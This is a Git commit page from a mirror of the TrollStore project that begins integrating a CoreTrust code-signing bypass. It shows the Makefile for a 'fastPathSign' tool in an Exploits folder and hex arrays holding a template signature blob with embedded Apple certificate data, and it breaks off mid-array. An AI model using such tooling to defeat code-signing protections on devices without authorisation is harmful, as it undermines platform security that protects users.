bughz
/
TrollStore
mirror of https://github.com/opa334/TrollStore.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

First work on integrating with new CoreTrust bypass

This commit is contained in:
opa334 2023-11-26 17:43:01 +01:00
parent 3d89c079a2
commit e672aaebd5
49 changed files with 5348 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
Exploits/fastPathSign/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
fastPathSign

12
Exploits/fastPathSign/Makefile Normal file
View File

@ -0,0 +1,12 @@
TARGET = fastPathSign
CC = clang
CFLAGS = -framework Foundation -framework CoreServices -framework Security -fobjc-arc $(shell pkg-config --cflags libcrypto) -Isrc/external/include
LDFLAGS = $(shell pkg-config --libs libcrypto) -Lsrc/external/lib -lchoma
$(TARGET): $(wildcard src/*.m src/*.c)
$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^
clean:
@rm -f $(TARGET)

2709
Exploits/fastPathSign/src/Templates/AppStoreCodeDirectory.h Normal file
View File

File diff suppressed because it is too large Load Diff

8
Exploits/fastPathSign/src/Templates/DecryptedSignature.h Normal file
View File

@ -0,0 +1,8 @@
unsigned char DecryptedSignature[] = {
0x30, 0x31, 0x30, 0x0d, 0x06, 0x09, 0x60, 0x86, 0x48, 0x01, 0x65, 0x03,
0x04, 0x02, 0x01, 0x05, 0x00, 0x04, 0x20, 0xe2, 0x34, 0xf9, 0x25, 0x65,
0xa4, 0x33, 0xb7, 0x13, 0x67, 0xc8, 0x63, 0x93, 0xdc, 0x41, 0xaa, 0xc4,
0x0e, 0x76, 0xa0, 0x80, 0x29, 0x8b, 0x38, 0x9e, 0xc5, 0x6d, 0xd6, 0xba,
0xef, 0xbf, 0x0d
};
unsigned int DecryptedSignature_len = 51;

555
Exploits/fastPathSign/src/Templates/SignatureBlob.h Normal file
View File

@ -0,0 +1,555 @@
unsigned char TemplateSignatureBlob[] = {
0xfa, 0xde, 0x0b, 0x01, 0x00, 0x00, 0x19, 0xd5, 0x30, 0x80, 0x06, 0x09,
0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x07, 0x02, 0xa0, 0x80, 0x30,
0x80, 0x02, 0x01, 0x01, 0x31, 0x0f, 0x30, 0x0d, 0x06, 0x09, 0x60, 0x86,
0x48, 0x01, 0x65, 0x03, 0x04, 0x02, 0x01, 0x05, 0x00, 0x30, 0x80, 0x06,
0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x07, 0x01, 0x00, 0x00,
0xa0, 0x82, 0x11, 0xb9, 0x30, 0x82, 0x04, 0x24, 0x30, 0x82, 0x03, 0x0c,
0xa0, 0x03, 0x02, 0x01, 0x02, 0x02, 0x08, 0x40, 0x60, 0x57, 0xb3, 0xc9,
0xbf, 0x9d, 0xf0, 0x30, 0x0d, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7,
0x0d, 0x01, 0x01, 0x0b, 0x05, 0x00, 0x30, 0x73, 0x31, 0x2d, 0x30, 0x2b,
0x06, 0x03, 0x55, 0x04, 0x03, 0x0c, 0x24, 0x41, 0x70, 0x70, 0x6c, 0x65,
0x20, 0x69, 0x50, 0x68, 0x6f, 0x6e, 0x65, 0x20, 0x43, 0x65, 0x72, 0x74,
0x69, 0x66, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x41, 0x75,
0x74, 0x68, 0x6f, 0x72, 0x69, 0x74, 0x79, 0x31, 0x20, 0x30, 0x1e, 0x06,
0x03, 0x55, 0x04, 0x0b, 0x0c, 0x17, 0x43, 0x65, 0x72, 0x74, 0x69, 0x66,
0x69, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x41, 0x75, 0x74, 0x68,
0x6f, 0x72, 0x69, 0x74, 0x79, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55,
0x04, 0x0a, 0x0c, 0x0a, 0x41, 0x70, 0x70, 0x6c, 0x65, 0x20, 0x49, 0x6e,
0x63, 0x2e, 0x31, 0x0b, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13,
0x02, 0x55, 0x53, 0x30, 0x1e, 0x17, 0x0d, 0x31, 0x39, 0x30, 0x37, 0x31,
0x36, 0x30, 0x33, 0x35, 0x33, 0x32, 0x32, 0x5a, 0x17, 0x0d, 0x32, 0x31,
0x30, 0x38, 0x31, 0x34, 0x30, 0x33, 0x35, 0x33, 0x32, 0x32, 0x5a, 0x30,
0x61, 0x31, 0x0b, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02,
0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x0a, 0x0c,
0x0a, 0x41, 0x70, 0x70, 0x6c, 0x65, 0x20, 0x49, 0x6e, 0x63, 0x2e, 0x31,
0x0f, 0x30, 0x0d, 0x06, 0x03, 0x55, 0x04, 0x0b, 0x0c, 0x06, 0x69, 0x50,
0x68, 0x6f, 0x6e, 0x65, 0x31, 0x2c, 0x30, 0x2a, 0x06, 0x03, 0x55, 0x04,
0x03, 0x0c, 0x23, 0x41, 0x70, 0x70, 0x6c, 0x65, 0x20, 0x69, 0x50, 0x68,
0x6f, 0x6e, 0x65, 0x20, 0x4f, 0x53, 0x20, 0x41, 0x70, 0x70, 0x6c, 0x69,
0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x53, 0x69, 0x67, 0x6e, 0x69,
0x6e, 0x67, 0x30, 0x82, 0x01, 0x22, 0x30, 0x0d, 0x06, 0x09, 0x2a, 0x86,
0x48, 0x86, 0xf7, 0x0d, 0x01, 0x01, 0x01, 0x05, 0x00, 0x03, 0x82, 0x01,
0x0f, 0x00, 0x30, 0x82, 0x01, 0x0a, 0x02, 0x82, 0x01, 0x01, 0x00, 0xcb,
0x4d, 0x05, 0x28, 0x65, 0x53, 0x8c, 0xd3, 0xec, 0x58, 0x78, 0x4d, 0x06,
0x54, 0xae, 0xa0, 0x5b, 0x54, 0x07, 0xb5, 0xf1, 0x14, 0xc3, 0x85, 0x5f,
0x94, 0x9b, 0xb5, 0x87, 0x62, 0x6c, 0x86, 0xc9, 0x67, 0xff, 0x06, 0x2e,
0x34, 0x9a, 0x56, 0x1e, 0x0f, 0x96, 0x52, 0x3e, 0xc7, 0x5e, 0x26, 0xa2,
0x68, 0xdc, 0xad, 0x7e, 0x51, 0xdf, 0xa4, 0x51, 0x43, 0x1b, 0xd3, 0x73,
0xa3, 0xc9, 0x8a, 0x35, 0x55, 0x39, 0x14, 0x36, 0x5d, 0xaf, 0x98, 0x4f,
0x53, 0x62, 0xb4, 0x71, 0x91, 0xfe, 0x3f, 0xbd, 0xb5, 0xb2, 0x3f, 0x59,
0x0f, 0xe1, 0xda, 0xef, 0x82, 0xb9, 0x63, 0x94, 0xf4, 0xb6, 0x01, 0x50,
0x75, 0xdd, 0xb9, 0xeb, 0xb8, 0x9c, 0xe0, 0x67, 0xb5, 0xdd, 0xa1, 0xcc,
0x68, 0x90, 0x4a, 0x6d, 0x4b, 0x07, 0xe4, 0xa9, 0x83, 0xde, 0x9a, 0xa2,
0xf5, 0x40, 0x5b, 0x30, 0x3a, 0x40, 0xbd, 0x11, 0x2d, 0x17, 0x18, 0xd7,
0xe1, 0xeb, 0xa0, 0xe7, 0xf0, 0x69, 0x0f, 0x28, 0x88, 0x8e, 0xf1, 0x1d,
0xfc, 0x47, 0xb9, 0x97, 0xe5, 0x14, 0xae, 0xc1, 0x4f, 0xaa, 0x9a, 0x30,
0xdb, 0x74, 0x0e, 0xf9, 0xf5, 0xc0, 0xa2, 0x5a, 0xc5, 0xf3, 0x77, 0x32,
0x2e, 0xbc, 0x21, 0xa6, 0x53, 0xa8, 0xef, 0x24, 0x99, 0x15, 0x0a, 0x66,
0x64, 0x81, 0xfa, 0x19, 0x17, 0x0e, 0x55, 0xd1, 0xf5, 0xcf, 0xbf, 0x75,
0x91, 0xcd, 0x7d, 0xaa, 0xa2, 0xa0, 0xa0, 0x67, 0xbb, 0x2c, 0xc6, 0xff,
0x59, 0x15, 0x0f, 0x65, 0x19, 0xfc, 0xad, 0x04, 0xa3, 0x34, 0x84, 0x90,
0x49, 0x1d, 0x60, 0x42, 0xaf, 0x0a, 0xc7, 0xb0, 0x47, 0x92, 0x6f, 0x14,
0xb6, 0xf1, 0x1d, 0x5e, 0x60, 0xe2, 0xe8, 0xb1, 0xfa, 0x28, 0xaf, 0x2c,
0xe9, 0x3b, 0x06, 0x77, 0x84, 0x31, 0xfa, 0x2d, 0x9b, 0x9b, 0x4e, 0xe4,
0x71, 0xac, 0x77, 0x02, 0x03, 0x01, 0x00, 0x01, 0xa3, 0x81, 0xcd, 0x30,
0x81, 0xca, 0x30, 0x0c, 0x06, 0x03, 0x55, 0x1d, 0x13, 0x01, 0x01, 0xff,
0x04, 0x02, 0x30, 0x00, 0x30, 0x1f, 0x06, 0x03, 0x55, 0x1d, 0x23, 0x04,
0x18, 0x30, 0x16, 0x80, 0x14, 0x6f, 0xf1, 0x95, 0x18, 0x62, 0x5c, 0xe0,
0xc8, 0xf1, 0xc5, 0xed, 0x6c, 0x18, 0xc9, 0xe0, 0xd3, 0x64, 0x52, 0x98,
0x20, 0x30, 0x40, 0x06, 0x08, 0x2b, 0x06, 0x01, 0x05, 0x05, 0x07, 0x01,
0x01, 0x04, 0x34, 0x30, 0x32, 0x30, 0x30, 0x06, 0x08, 0x2b, 0x06, 0x01,
0x05, 0x05, 0x07, 0x30, 0x01, 0x86, 0x24, 0x68, 0x74, 0x74, 0x70, 0x3a,
0x2f, 0x2f, 0x6f, 0x63, 0x73, 0x70, 0x2e, 0x61, 0x70, 0x70, 0x6c, 0x65,
0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6f, 0x63, 0x73, 0x70, 0x30, 0x33, 0x2d,
0x61, 0x69, 0x70, 0x63, 0x61, 0x30, 0x34, 0x30, 0x16, 0x06, 0x03, 0x55,
0x1d, 0x25, 0x01, 0x01, 0xff, 0x04, 0x0c, 0x30, 0x0a, 0x06, 0x08, 0x2b,
0x06, 0x01, 0x05, 0x05, 0x07, 0x03, 0x03, 0x30, 0x1d, 0x06, 0x03, 0x55,
0x1d, 0x0e, 0x04, 0x16, 0x04, 0x14, 0x94, 0xb8, 0xc9, 0x60, 0x37, 0xb9,
0xfb, 0x8f, 0x0a, 0x5e, 0xd8, 0xa8, 0x8d, 0x65, 0x7c, 0xa3, 0x36, 0x39,
0x02, 0x30, 0x30, 0x0e, 0x06, 0x03, 0x55, 0x1d, 0x0f, 0x01, 0x01, 0xff,
0x04, 0x04, 0x03, 0x02, 0x07, 0x80, 0x30, 0x10, 0x06, 0x0a, 0x2a, 0x86,
0x48, 0x86, 0xf7, 0x63, 0x64, 0x06, 0x01, 0x03, 0x04, 0x02, 0x05, 0x00,
0x30, 0x0d, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x01,
0x0b, 0x05, 0x00, 0x03, 0x82, 0x01, 0x01, 0x00, 0x78, 0xf3, 0x62, 0x53,
0x4b, 0x57, 0xfb, 0x4f, 0x61, 0x7f, 0x6f, 0x59, 0xd5, 0x37, 0x74, 0x4d,
0x7b, 0xd3, 0xca, 0x21, 0x5c, 0xbf, 0xae, 0x19, 0x86, 0xd2, 0xa3, 0x22,
0xa7, 0xf3, 0xe9, 0x39, 0xd9, 0x31, 0x49, 0x69, 0x26, 0xde, 0xff, 0x98,
0x8b, 0xea, 0x91, 0x90, 0x73, 0x76, 0x4e, 0x75, 0x2d, 0x63, 0x98, 0x80,
0x3f, 0xd7, 0xbe, 0x3c, 0x99, 0x83, 0xb9, 0x01, 0x43, 0x92, 0x03, 0xa6,
0x3a, 0x05, 0x4e, 0x57, 0x18, 0xd0, 0x8e, 0xdd, 0x1b, 0x0e, 0xde, 0x7d,
0xc4, 0x24, 0x0b, 0x42, 0x6d, 0x6f, 0xe4, 0x47, 0xd8, 0xc4, 0x78, 0x61,
0xb7, 0xc3, 0x42, 0xd2, 0xe7, 0x40, 0x79, 0x2f, 0x34, 0x30, 0x49, 0x9a,
0xaf, 0xb1, 0x9e, 0xa9, 0xfa, 0x66, 0x38, 0x78, 0x30, 0x68, 0x94, 0xdc,
0xa7, 0x55, 0xfc, 0xbf, 0x7e, 0x9d, 0x87, 0x0c, 0xc4, 0x63, 0x31, 0x8a,
0x0e, 0x6b, 0xbe, 0xc5, 0x07, 0xa6, 0x91, 0xc2, 0x04, 0x62, 0x53, 0x8d,
0xae, 0x6d, 0xcb, 0x36, 0x56, 0xce, 0xc8, 0xaf, 0x39, 0xa5, 0xcb, 0x7e,
0x90, 0x0f, 0x95, 0xcc, 0xc1, 0x43, 0x3a, 0xcd, 0xc9, 0x06, 0xb1, 0x99,
0xd0, 0xfd, 0xf0, 0xa8, 0x42, 0xa8, 0xa0, 0xcf, 0x7a, 0x1b, 0xed, 0xde,
0x67, 0x1c, 0x6e, 0xcd, 0x63, 0x38, 0xd5, 0x90, 0x0c, 0xee, 0x33, 0xb0,
0xdd, 0x0e, 0x82, 0x8a, 0xc5, 0xb5, 0xb9, 0x7a, 0xe4, 0x07, 0x3b, 0x51,
0x84, 0xbd, 0x8b, 0x58, 0x37, 0xa7, 0xf2, 0x4b, 0xb4, 0xe6, 0x16, 0x24,
0x65, 0x8c, 0xb9, 0xba, 0x34, 0xd3, 0xfe, 0xf0, 0x29, 0x22, 0x85, 0xa7,
0x74, 0x5c, 0x32, 0x6b, 0x88, 0x45, 0xc9, 0xde, 0x21, 0x8e, 0xd3, 0x53,
0x9c, 0x3a, 0xd9, 0x40, 0x33, 0x59, 0x3f, 0x6f, 0xfe, 0x35, 0xc6, 0x2b,
0x71, 0xd0, 0x3c, 0xdd, 0x36, 0x8f, 0x8e, 0x66, 0xea, 0x01, 0x25, 0x18,
0x30, 0x82, 0x04, 0x44, 0x30, 0x82, 0x03, 0x2c, 0xa0, 0x03, 0x02, 0x01,
0x02, 0x02, 0x08, 0x5c, 0x63, 0xca, 0xe4, 0x4a, 0x37, 0x53, 0xc9, 0x30,
0x0d, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x01, 0x0b,
0x05, 0x00, 0x30, 0x62, 0x31, 0x0b, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04,
0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55,
0x04, 0x0a, 0x13, 0x0a, 0x41, 0x70, 0x70, 0x6c, 0x65, 0x20, 0x49, 0x6e,
0x63, 0x2e, 0x31, 0x26, 0x30, 0x24, 0x06, 0x03, 0x55, 0x04, 0x0b, 0x13,
0x1d, 0x41, 0x70, 0x70, 0x6c, 0x65, 0x20, 0x43, 0x65, 0x72, 0x74, 0x69,
0x66, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x41, 0x75, 0x74,
0x68, 0x6f, 0x72, 0x69, 0x74, 0x79, 0x31, 0x16, 0x30, 0x14, 0x06, 0x03,
0x55, 0x04, 0x03, 0x13, 0x0d, 0x41, 0x70, 0x70, 0x6c, 0x65, 0x20, 0x52,
0x6f, 0x6f, 0x74, 0x20, 0x43, 0x41, 0x30, 0x1e, 0x17, 0x0d, 0x31, 0x37,
0x30, 0x35, 0x31, 0x30, 0x32, 0x31, 0x32, 0x37, 0x33, 0x30, 0x5a, 0x17,
0x0d, 0x33, 0x30, 0x31, 0x32, 0x33, 0x31, 0x30, 0x30, 0x30, 0x30, 0x30,
0x30, 0x5a, 0x30, 0x73, 0x31, 0x2d, 0x30, 0x2b, 0x06, 0x03, 0x55, 0x04,
0x03, 0x0c, 0x24, 0x41, 0x70, 0x70, 0x6c, 0x65, 0x20, 0x69, 0x50, 0x68,
0x6f, 0x6e, 0x65, 0x20, 0x43, 0x65, 0x72, 0x74, 0x69, 0x66, 0x69, 0x63,
0x61, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x41, 0x75, 0x74, 0x68, 0x6f, 0x72,
0x69, 0x74, 0x79, 0x31, 0x20, 0x30, 0x1e, 0x06, 0x03, 0x55, 0x04, 0x0b,
0x0c, 0x17, 0x43, 0x65, 0x72, 0x74, 0x69, 0x66, 0x69, 0x63, 0x61, 0x74,
0x69, 0x6f, 0x6e, 0x20, 0x41, 0x75, 0x74, 0x68, 0x6f, 0x72, 0x69, 0x74,
0x79, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x0a, 0x0c, 0x0a,
0x41, 0x70, 0x70, 0x6c, 0x65, 0x20, 0x49, 0x6e, 0x63, 0x2e, 0x31, 0x0b,
0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x30,
0x82, 0x01, 0x22, 0x30, 0x0d, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7,
0x0d, 0x01, 0x01, 0x01, 0x05, 0x00, 0x03, 0x82, 0x01, 0x0f, 0x00, 0x30,
0x82, 0x01, 0x0a, 0x02, 0x82, 0x01, 0x01, 0x00, 0xc9, 0x45, 0x6a, 0x01,
0x0f, 0x3e, 0x83, 0x04, 0x86, 0xc7, 0xfc, 0xbf, 0xdc, 0x5e, 0xf0, 0x1e,
0x81, 0xee, 0x17, 0x30, 0x73, 0x63, 0x26, 0x2e, 0xde, 0x3d, 0x7a, 0x24,
0xcd, 0x93, 0x3e, 0x4f, 0x39, 0x47, 0xba, 0x75, 0xbe, 0xf3, 0xc0, 0xd2,
0xf1, 0x59, 0xa2, 0xab, 0x1f, 0xfe, 0x0a, 0x86, 0x3c, 0xd9, 0x2d, 0x9a,
0x07, 0xf2, 0x0e, 0x6b, 0xb9, 0x29, 0x91, 0x1a, 0x5f, 0x22, 0x0a, 0x8b,
0xf1, 0x72, 0x58, 0x05, 0xae, 0x4c, 0x4b, 0x44, 0xc5, 0x79, 0xa7, 0x80,
0x3c, 0xb0, 0x88, 0xe0, 0x8c, 0x0c, 0x27, 0x84, 0x5d, 0x19, 0xe5, 0x87,
0x19, 0x36, 0xcb, 0xe3, 0xc5, 0x76, 0xb7, 0xb0, 0xf4, 0x41, 0x72, 0x51,
0xf4, 0x05, 0x5c, 0x83, 0x4b, 0xa2, 0x6d, 0xa6, 0x51, 0xb8, 0xf1, 0x26,
0xdf, 0x7b, 0x5e, 0xad, 0x65, 0x0c, 0xc6, 0xb2, 0x98, 0x51, 0x8c, 0xbb,
0x7d, 0x1b, 0x4c, 0xc1, 0x4e, 0xc8, 0x08, 0xc7, 0xd2, 0xed, 0x64, 0x0b,
0xb4, 0xdd, 0x1b, 0x8d, 0x4f, 0x40, 0x7d, 0x1b, 0x8f, 0x48, 0x96, 0x92,
0x5b, 0xf3, 0xd0, 0x98, 0x7e, 0xd9, 0xbc, 0xa4, 0x19, 0x0e, 0x99, 0x61,
0xbb, 0x41, 0x5d, 0x01, 0xcc, 0x5b, 0x77, 0x7a, 0x7d, 0x24, 0xd0, 0xdc,
0xd3, 0x53, 0xff, 0xc3, 0xdc, 0xc5, 0x94, 0x2c, 0xb6, 0x5a, 0x4d, 0x8e,
0x18, 0x23, 0x39, 0xbd, 0xd9, 0xc6, 0x52, 0x3e, 0xd1, 0xf2, 0xf4, 0x25,
0x8a, 0xa1, 0x2a, 0x87, 0xfd, 0xd8, 0x0c, 0x46, 0x29, 0x51, 0xff, 0xed,
0x17, 0x6c, 0x89, 0x25, 0x6b, 0x87, 0xbf, 0x8a, 0x69, 0x14, 0x9f, 0x77,
0x9f, 0xc3, 0x15, 0xb7, 0x68, 0xb3, 0x88, 0x45, 0xbd, 0x84, 0xe6, 0x06,
0x02, 0x41, 0x64, 0x0f, 0xad, 0x2a, 0x28, 0xb8, 0x15, 0xc9, 0xe0, 0xac,
0xa7, 0x8a, 0xba, 0x72, 0x04, 0x34, 0xb2, 0x78, 0x8c, 0xf8, 0xb2, 0x85,
0x02, 0x03, 0x01, 0x00, 0x01, 0xa3, 0x81, 0xec, 0x30, 0x81, 0xe9, 0x30,
0x0f, 0x06, 0x03, 0x55, 0x1d, 0x13, 0x01, 0x01, 0xff, 0x04, 0x05, 0x30,
0x03, 0x01, 0x01, 0xff, 0x30, 0x1f, 0x06, 0x03, 0x55, 0x1d, 0x23, 0x04,
0x18, 0x30, 0x16, 0x80, 0x14, 0x2b, 0xd0, 0x69, 0x47, 0x94, 0x76, 0x09,
0xfe, 0xf4, 0x6b, 0x8d, 0x2e, 0x40, 0xa6, 0xf7, 0x47, 0x4d, 0x7f, 0x08,
0x5e, 0x30, 0x44, 0x06, 0x08, 0x2b, 0x06, 0x01, 0x05, 0x05, 0x07, 0x01,
0x01, 0x04, 0x38, 0x30, 0x36, 0x30, 0x34, 0x06, 0x08, 0x2b, 0x06, 0x01,
0x05, 0x05, 0x07, 0x30, 0x01, 0x86, 0x28, 0x68, 0x74, 0x74, 0x70, 0x3a,
0x2f, 0x2f, 0x6f, 0x63, 0x73, 0x70, 0x2e, 0x61, 0x70, 0x70, 0x6c, 0x65,
0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6f, 0x63, 0x73, 0x70, 0x30, 0x33, 0x2d,
0x61, 0x70, 0x70, 0x6c, 0x65, 0x72, 0x6f, 0x6f, 0x74, 0x63, 0x61, 0x30,
0x2e, 0x06, 0x03, 0x55, 0x1d, 0x1f, 0x04, 0x27, 0x30, 0x25, 0x30, 0x23,
0xa0, 0x21, 0xa0, 0x1f, 0x86, 0x1d, 0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f,
0x2f, 0x63, 0x72, 0x6c, 0x2e, 0x61, 0x70, 0x70, 0x6c, 0x65, 0x2e, 0x63,
0x6f, 0x6d, 0x2f, 0x72, 0x6f, 0x6f, 0x74, 0x2e, 0x63, 0x72, 0x6c, 0x30,
0x1d, 0x06, 0x03, 0x55, 0x1d, 0x0e, 0x04, 0x16, 0x04, 0x14, 0x6f, 0xf1,
0x95, 0x18, 0x62, 0x5c, 0xe0, 0xc8, 0xf1, 0xc5, 0xed, 0x6c, 0x18, 0xc9,
0xe0, 0xd3, 0x64, 0x52, 0x98, 0x20, 0x30, 0x0e, 0x06, 0x03, 0x55, 0x1d,
0x0f, 0x01, 0x01, 0xff, 0x04, 0x04, 0x03, 0x02, 0x01, 0x06, 0x30, 0x10,
0x06, 0x0a, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x63, 0x64, 0x06, 0x02, 0x12,
0x04, 0x02, 0x05, 0x00, 0x30, 0x0d, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86,
0xf7, 0x0d, 0x01, 0x01, 0x0b, 0x05, 0x00, 0x03, 0x82, 0x01, 0x01, 0x00,
0x3a, 0xcf, 0xac, 0x98, 0x8d, 0xbe, 0x92, 0x20, 0x21, 0x09, 0xad, 0x95,
0xf3, 0xb1, 0x5c, 0x21, 0xfa, 0x36, 0x2d, 0x57, 0x20, 0x44, 0x74, 0x73,
0x64, 0x92, 0x08, 0xb3, 0x96, 0xac, 0xf7, 0x6d, 0x97, 0xfa, 0x5b, 0x34,
0x38, 0x27, 0xcf, 0x12, 0x46, 0xd3, 0x3c, 0x11, 0xf0, 0x07, 0xc9, 0x99,
0x90, 0xb1, 0xd1, 0xe8, 0x11, 0x09, 0xa5, 0xe3, 0xa5, 0x6b, 0x6c, 0x63,
0x08, 0x3f, 0x9e, 0x25, 0xfa, 0xd5, 0x99, 0x9c, 0x4c, 0xe6, 0xe5, 0xce,
0x8e, 0xb2, 0x4d, 0x68, 0xec, 0x8b, 0xab, 0xa3, 0xa2, 0x4f, 0x8a, 0x11,
0x15, 0x3e, 0xdc, 0x14, 0x2b, 0x1c, 0xc6, 0x44, 0xb6, 0x6f, 0x67, 0xc5,
0x5b, 0x4f, 0x95, 0x29, 0x2d, 0x87, 0x5c, 0x3f, 0xdc, 0x83, 0x1e, 0x77,
0x4f, 0xed, 0xda, 0x54, 0xa7, 0x2d, 0xe7, 0x13, 0x81, 0xc1, 0x63, 0xc4,
0x54, 0x0b, 0x1b, 0x4b, 0x0a, 0x6a, 0x28, 0x22, 0x08, 0xd4, 0x37, 0x92,
0x7c, 0x7f, 0x67, 0x28, 0x5f, 0xaf, 0x3d, 0x3f, 0xb7, 0xac, 0x59, 0x1d,
0x38, 0x34, 0x64, 0x5a, 0xee, 0x33, 0x4a, 0x19, 0x42, 0x44, 0x29, 0xc4,
0xca, 0x18, 0x6b, 0xe1, 0xc1, 0x53, 0x2d, 0x2d, 0xf4, 0x4d, 0xc2, 0x15,
0xf6, 0x33, 0x32, 0x18, 0x78, 0xf1, 0x26, 0x6f, 0x8a, 0x4d, 0xeb, 0x94,
0x4c, 0xa3, 0xe8, 0xff, 0x0f, 0xb3, 0x03, 0x8b, 0x65, 0xda, 0xeb, 0x2e,
0xd8, 0x65, 0x50, 0x9f, 0xdc, 0x9f, 0x8a, 0xdf, 0x31, 0xa8, 0x84, 0x54,
0xdc, 0x52, 0x52, 0x41, 0xd2, 0xb2, 0x13, 0x1d, 0x31, 0x46, 0x47, 0x88,
0x5f, 0x3e, 0xee, 0xc3, 0xf2, 0x8c, 0x23, 0x04, 0x95, 0xeb, 0xac, 0x8a,
0x3e, 0x82, 0x6c, 0x06, 0x9f, 0x2e, 0xe3, 0x8b, 0x43, 0x9a, 0x62, 0x5b,
0x34, 0x0d, 0xf4, 0x99, 0xcf, 0x2c, 0xee, 0xba, 0x72, 0x86, 0x19, 0x23,
0xa5, 0xfc, 0x8e, 0xb5, 0x30, 0x82, 0x04, 0xbb, 0x30, 0x82, 0x03, 0xa3,
0xa0, 0x03, 0x02, 0x01, 0x02, 0x02, 0x01, 0x02, 0x30, 0x0d, 0x06, 0x09,
0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x01, 0x05, 0x05, 0x00, 0x30,
0x62, 0x31, 0x0b, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02,
0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x0a, 0x13,
0x0a, 0x41, 0x70, 0x70, 0x6c, 0x65, 0x20, 0x49, 0x6e, 0x63, 0x2e, 0x31,
0x26, 0x30, 0x24, 0x06, 0x03, 0x55, 0x04, 0x0b, 0x13, 0x1d, 0x41, 0x70,
0x70, 0x6c, 0x65, 0x20, 0x43, 0x65, 0x72, 0x74, 0x69, 0x66, 0x69, 0x63,
0x61, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x41, 0x75, 0x74, 0x68, 0x6f, 0x72,
0x69, 0x74, 0x79, 0x31, 0x16, 0x30, 0x14, 0x06, 0x03, 0x55, 0x04, 0x03,
0x13, 0x0d, 0x41, 0x70, 0x70, 0x6c, 0x65, 0x20, 0x52, 0x6f, 0x6f, 0x74,
0x20, 0x43, 0x41, 0x30, 0x1e, 0x17, 0x0d, 0x30, 0x36, 0x30, 0x34, 0x32,
0x35, 0x32, 0x31, 0x34, 0x30, 0x33, 0x36, 0x5a, 0x17, 0x0d, 0x33, 0x35,
0x30, 0x32, 0x30, 0x39, 0x32, 0x31, 0x34, 0x30, 0x33, 0x36, 0x5a, 0x30,
0x62, 0x31, 0x0b, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02,
0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x0a, 0x13,
0x0a, 0x41, 0x70, 0x70, 0x6c, 0x65, 0x20, 0x49, 0x6e, 0x63, 0x2e, 0x31,
0x26, 0x30, 0x24, 0x06, 0x03, 0x55, 0x04, 0x0b, 0x13, 0x1d, 0x41, 0x70,
0x70, 0x6c, 0x65, 0x20, 0x43, 0x65, 0x72, 0x74, 0x69, 0x66, 0x69, 0x63,
0x61, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x41, 0x75, 0x74, 0x68, 0x6f, 0x72,
0x69, 0x74, 0x79, 0x31, 0x16, 0x30, 0x14, 0x06, 0x03, 0x55, 0x04, 0x03,
0x13, 0x0d, 0x41, 0x70, 0x70, 0x6c, 0x65, 0x20, 0x52, 0x6f, 0x6f, 0x74,
0x20, 0x43, 0x41, 0x30, 0x82, 0x01, 0x22, 0x30, 0x0d, 0x06, 0x09, 0x2a,
0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x01, 0x01, 0x05, 0x00, 0x03, 0x82,
0x01, 0x0f, 0x00, 0x30, 0x82, 0x01, 0x0a, 0x02, 0x82, 0x01, 0x01, 0x00,
0xe4, 0x91, 0xa9, 0x09, 0x1f, 0x91, 0xdb, 0x1e, 0x47, 0x50, 0xeb, 0x05,
0xed, 0x5e, 0x79, 0x84, 0x2d, 0xeb, 0x36, 0xa2, 0x57, 0x4c, 0x55, 0xec,
0x8b, 0x19, 0x89, 0xde, 0xf9, 0x4b, 0x6c, 0xf5, 0x07, 0xab, 0x22, 0x30,
0x02, 0xe8, 0x18, 0x3e, 0xf8, 0x50, 0x09, 0xd3, 0x7f, 0x41, 0xa8, 0x98,
0xf9, 0xd1, 0xca, 0x66, 0x9c, 0x24, 0x6b, 0x11, 0xd0, 0xa3, 0xbb, 0xe4,
0x1b, 0x2a, 0xc3, 0x1f, 0x95, 0x9e, 0x7a, 0x0c, 0xa4, 0x47, 0x8b, 0x5b,
0xd4, 0x16, 0x37, 0x33, 0xcb, 0xc4, 0x0f, 0x4d, 0xce, 0x14, 0x69, 0xd1,
